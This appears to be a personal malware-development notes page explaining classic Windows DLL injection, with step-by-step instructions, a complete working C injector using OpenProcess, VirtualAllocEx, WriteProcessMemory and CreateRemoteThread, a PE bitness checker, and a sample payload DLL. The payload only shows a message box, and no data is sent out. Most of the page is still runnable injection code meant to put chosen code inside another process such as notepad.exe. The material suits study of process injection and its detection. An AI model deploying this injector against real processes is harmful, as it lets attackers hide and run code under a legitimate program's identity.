description
06-21-2023

📚 DLL Injection

What is DLL Injection?

A process injection technique in which an attacker forces another, usually legitimate, process to load a DLL of the attacker's choosing, so that the attacker's code runs inside that process's address space and under its identity.

The injector writes the path of its malicious DLL into the virtual address space of a legitimate process using WriteProcessMemory(). This function writes data to a region of memory in a specified process; the region is allocated beforehand with VirtualAllocEx().

It then makes the remote process load the DLL by creating a thread in the target with CreateRemoteThread(), using LoadLibraryA() as the thread's start routine and the address of the written path as its single argument. The target's own loader does the rest: the DLL is mapped into the victim and its DllMain runs there.

High Level Explanation

Injector -> OpenProcess() on Targeted Program.exe (victim) -> VirtualAllocEx() -> WriteProcessMemory() -> GetProcAddress() -> CreateRemoteThread()

  1. Open a handle to the target process (OpenProcess()) with enough rights to allocate and write memory and to create threads.
  2. Allocate memory inside the target process (VirtualAllocEx()).
  3. Write the DLL's path into the allocated region (WriteProcessMemory()).
  4. Resolve the address of LoadLibraryA() (or LoadLibraryW() if the path was written as a wide string) with GetProcAddress(), then call CreateRemoteThread() with that address as the start routine and the remote buffer as its parameter, so the new thread executes LoadLibraryA(<DLL path>) inside the remote process. This works because kernel32.dll is mapped at the same base address in every process (ASLR randomizes it per boot, not per process), so the injector's local address of LoadLibraryA() is valid in the target.

PoC

{% embed url="https://github.com/0xXyc/maldev/blob/main/winAPI/dll-injection/inject-dll.c" %}

This program requires a single command line argument: a valid PID.

Use Task Manager to find the PID of the process you want to target. The current build was tested on a Windows 11 machine, targeting an x64 process with a 64-bit DLL, as of the time of this writing. Bitness must match all the way through: a 64-bit injector, a 64-bit target and a 64-bit DLL, since LoadLibraryA() in a 64-bit process cannot load a 32-bit DLL (the remote thread's load fails with ERROR_BAD_EXE_FORMAT).
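A check worth running before injecting, because a bitness mismatch only surfaces as a silent failure inside the target: read the DLL's PE header and confirm its Machine field matches the target's bitness. The code below is an added example written for this page, not the page's or the maldev repo's own code. It parses only the MZ/PE header bytes (portable C, so it builds anywhere), and the Windows-only process_bits() helper assumes a 64-bit host OS, as in the page's setup, where IsWow64Process() reports TRUE for 32-bit processes. The header stub built by build_header_stub() is constructed sample data, not a loadable DLL.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

#define PE_MACHINE_I386  0x014c   /* IMAGE_FILE_MACHINE_I386  */
#define PE_MACHINE_AMD64 0x8664   /* IMAGE_FILE_MACHINE_AMD64 */

/* PE fields are little-endian on disk; decode byte-wise so this works on any host. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns IMAGE_FILE_HEADER.Machine of the PE image in img, or 0 if the buffer
 * does not start with a well-formed MZ/PE header. Only header bytes are read. */
uint16_t pe_machine(const uint8_t *img, size_t len)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z')   /* IMAGE_DOS_HEADER.e_magic */
        return 0;
    uint32_t e_lfanew = rd32(img + 0x3c);               /* offset of the "PE\0\0" signature */
    if (e_lfanew > len - 6)                             /* need signature (4) + Machine (2) */
        return 0;
    if (memcmp(img + e_lfanew, "PE\0\0", 4) != 0)
        return 0;
    return rd16(img + e_lfanew + 4);                    /* first field of IMAGE_FILE_HEADER */
}

/* 1 if LoadLibrary in a process of the given bitness (64 or 32) can load a DLL with
 * this Machine value, 0 otherwise (the load fails with ERROR_BAD_EXE_FORMAT, 193). */
int dll_fits_process(uint16_t machine, int target_bits)
{
    if (target_bits == 64) return machine == PE_MACHINE_AMD64;
    if (target_bits == 32) return machine == PE_MACHINE_I386;
    return 0;
}

/* Constructed sample: the minimal header prefix pe_machine() inspects
 * (DOS header with e_lfanew = 0x40, then "PE\0\0" and Machine). Not a loadable DLL. */
size_t build_header_stub(uint8_t *buf, uint16_t machine)
{
    memset(buf, 0, 0x48);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[0x3c] = 0x40;                                   /* e_lfanew, little-endian */
    buf[0x40] = 'P'; buf[0x41] = 'E';                   /* "PE\0\0" (zeros already set) */
    buf[0x44] = (uint8_t)(machine & 0xff);
    buf[0x45] = (uint8_t)(machine >> 8);
    return 0x48;
}

#ifdef _WIN32
/* Bitness of an opened process. Assumes a 64-bit Windows host: IsWow64Process reports
 * TRUE for 32-bit processes running under WOW64. Needs PROCESS_QUERY_LIMITED_INFORMATION. */
int process_bits(HANDLE process)
{
    BOOL wow64 = FALSE;
    if (!IsWow64Process(process, &wow64)) return 0;
    return wow64 ? 32 : 64;
}
#endif

int main(int argc, char *argv[])
{
    uint8_t hdr[4096];
    size_t n;
    if (argc == 2) {                                    /* read a real DLL's header if a path is given */
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror("fopen"); return 1; }
        n = fread(hdr, 1, sizeof hdr, f);
        fclose(f);
    } else {
        n = build_header_stub(hdr, PE_MACHINE_AMD64);   /* constructed x64 stub */
    }
    uint16_t m = pe_machine(hdr, n);
    printf("Machine=0x%04x, fits an x64 target: %s\n", m, dll_fits_process(m, 64) ? "yes" : "no");
    return 0;
}
```

Run it as `pe-check.exe C:\testcode\hello-world-x64.dll` to inspect the DLL the injector points at; in the injector itself the same check belongs right after OpenProcess(), comparing pe_machine() of the DLL with process_bits() of the freshly opened handle.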

Instructions:

  1. For example, start notepad
  2. Right-click inside of task manager and select "Go to details"
  3. Look for the PID of notepad.exe
  4. Run the syntax below replacing <PID> with the PID of notepad.exe

Syntax:

./inject-dll.exe <PID>

Notice how the Hello World message box is grouped with notepad.exe on your taskbar:

Proving our message box was successfully injected into notepad.exe

inject-dll.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    HANDLE processHandle;
    HANDLE threadHandle;
    PVOID remoteBuffer;
    /* Path as the *target* process will resolve it; the DLL must exist there and match the target's bitness (x64 here) */
    LPCSTR dllPath = "C:\\testcode\\hello-world-x64.dll";
    SIZE_T dllPathLength = strlen(dllPath) + 1;   /* +1 so the NUL terminator is copied too */
    PTHREAD_START_ROUTINE threadStartRoutineAddress;
    DWORD pid;
    DWORD exitCode = 0;

    if(argc != 2)
    {
        printf("Usage: %s <PID>\n", argv[0]);
        return 1;
    }
    pid = (DWORD)atoi(argv[1]);
    printf("Injecting DLL to PID: %lu\n", pid);

    /* PROCESS_ALL_ACCESS is more than needed; CREATE_THREAD | QUERY_INFORMATION | VM_OPERATION | VM_WRITE | VM_READ is enough */
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(!processHandle)
    {
        printf("OpenProcess Failed: %lu\n", GetLastError());
        return 1;
    }

    /* Allocate a small read/write buffer in the target to hold the path string (no execute permission needed) */
    remoteBuffer = VirtualAllocEx(processHandle, NULL, dllPathLength, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if(!remoteBuffer)
    {
        printf("VirtualAllocEx Failed: %lu\n", GetLastError());
        return 1;
    }

    if(!WriteProcessMemory(processHandle, remoteBuffer, dllPath, dllPathLength, NULL))
    {
        printf("WriteProcessMemory Failed: %lu\n", GetLastError());
        return 1;
    }

    /* kernel32.dll is mapped at the same base in every process, so our local address of LoadLibraryA is valid in the target */
    threadStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
    if(!threadStartRoutineAddress)
    {
        printf("GetProcAddress Failed: %lu\n", GetLastError());
        return 1;
    }

    /* The new thread runs LoadLibraryA(remoteBuffer) inside the target */
    threadHandle = CreateRemoteThread(processHandle, NULL, 0, threadStartRoutineAddress, remoteBuffer, 0, NULL);
    if(!threadHandle)
    {
        printf("Remote thread failed. %lu\n", GetLastError());
        return 1;
    }

    /* Wait for LoadLibraryA to return. Its exit code is the low 32 bits of the HMODULE: zero means the load failed in the target */
    WaitForSingleObject(threadHandle, INFINITE);
    GetExitCodeThread(threadHandle, &exitCode);
    if(exitCode)
        printf("Success\n");
    else
        printf("LoadLibraryA returned NULL inside the target (wrong path or DLL bitness?)\n");

    CloseHandle(threadHandle);
    CloseHandle(processHandle);

    return 0;
}

DLL:

{% embed url="https://github.com/carterjones/hello-world-dll/releases/tag/v1.0.0" %}
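The page links a third-party hello-world DLL; the following is an added example of an equivalent payload DLL written for this page, not the page's or carterjones' code. It assumes a 64-bit build to match the x64 target (e.g. `x86_64-w64-mingw32-gcc -shared -o hello-world-x64.dll payload.c -luser32`, or `cl /LD payload.c user32.lib`), saved at the path the injector's dllPath points to. Unlike a plain "Hello World", the message box reports the PID and image path of the process the DLL ended up in, which is a stronger proof of injection than taskbar grouping. The payload runs on its own thread rather than directly in DllMain, since DllMain executes under the loader lock and blocking there (a MessageBox pumps messages) is a classic way to deadlock the host.

```c
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Formats the banner the injected DLL displays. Kept free of Win32 calls so it can be
 * unit-tested on any host; pid and exe are taken from the *target* process at run time,
 * which is what demonstrates that the code is executing inside it. Returns 1 on success,
 * 0 if the text did not fit in out. */
int build_banner(char *out, size_t out_len, unsigned long pid, const char *exe)
{
    int n = snprintf(out, out_len, "Hello from PID %lu inside %s", pid, exe);
    return n > 0 && (size_t)n < out_len;
}

#ifdef _WIN32
/* Payload thread: runs outside DllMain so the loader lock is not held while the
 * message box pumps messages. */
static DWORD WINAPI payload(LPVOID param)
{
    char exe[MAX_PATH] = "?";
    char msg[MAX_PATH + 64];
    (void)param;
    GetModuleFileNameA(NULL, exe, sizeof exe);       /* NULL = the host .exe, not this DLL */
    if (build_banner(msg, sizeof msg, GetCurrentProcessId(), exe))
        MessageBoxA(NULL, msg, "Injected DLL", MB_OK);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {               /* LoadLibraryA in the target lands here */
        DisableThreadLibraryCalls(hinst);             /* no THREAD_ATTACH/DETACH callbacks needed */
        HANDLE t = CreateThread(NULL, 0, payload, NULL, 0, NULL);
        if (t) CloseHandle(t);
    }
    return TRUE;                                      /* FALSE would make LoadLibraryA fail and unload us */
}
#endif
```

After injecting, the box should name notepad.exe's own path and PID; if the injector printed "Success" but no box appears, the DLL loaded but DllMain returned FALSE or the payload thread failed, so check DllMain's return value first.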

To Do:

  • I need to learn how to write my own DLLs